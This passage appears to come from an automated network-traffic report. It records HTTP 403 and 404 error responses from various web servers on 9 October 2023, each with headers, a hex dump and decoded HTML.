69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: Pepyaka/1.19.10X-Wix-Request-Id: 1696859472.5433167593793233779X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Mon, 09 Oct 2023 13:51:12 GMTX-Served-By: cache-lax10646-LGBX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,9WD8GAcpJgs/Ng1WkD2i0h9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLoEHOoo/2p1KdeeIJMpyT5AG/hKs8AeY1T4OIbgnD+yxVia: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 09 Oct 2023 13:51:27 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DeXdWjPmpdS97s8P9uiUUiayuY5%2B0PIAr1nFtXUS%2FXtNe5J4lxwwSvmJl%2BZnS3JVI5OdZNCWsekn%2FBqv2DOz41B58Qd7ANurPqtdsDETnnKH4Ua1NAB4HeSJPyxPtfnu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 813718d92e4614e0-LAXData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv=
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Mon, 09 Oct 2023 13:51:14 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:51:14 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:15 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 09 Oct 2023 13:51:17 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:51:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=15X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-us-west2,gcp-us-central1,gcp-us-central1X-Request-ID: 12c44641-ccea-4045-a2a3-ddf6f57c5dd7CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2boum%2Fpa0bSgVfPaFNJprAePbTNlbguSAyG%2BAQPqiIcikDoguG0f1GvMvQAZjodJT1PKMcPRklxTrOkuU%2FpcUgnvDwAet%2FVXk%2FWl3DDBswv2hXYFKQ0XZo21AvhN10e0OA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=80.999851Server: cloudflareCF-RAY: 813718fcdfed2a91-LAXalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:18 GMTServer: ApacheVary: X-Forwarded-For,Host,User-AgentX-Powered-By: PHP/5.3.3Content-Length: 1018Content-Type: text/html; charset=shift_jisData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 73 68 69 66 74 5f 6a 69 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 83 41 83 4e 83 5a 83 58 83 47 83 89 81 5b 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 62 61 73 65 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 69 64 3d 22 42 4d 61 6e 61 67 65 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 42 4d 61 69 6e 43 6f 6e 74 65 6e 74 73 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 46 65 6e 63 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 62 6f 78 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 5f 34 30 30 2e 67 69 66 22 20 61 6c 74 3d 22 22 20 2f 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:51:19 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1561X-XSS-Protection: 0X-Frame-Options: SAMEORIGINData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 09 Oct 2023 13:51:19 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
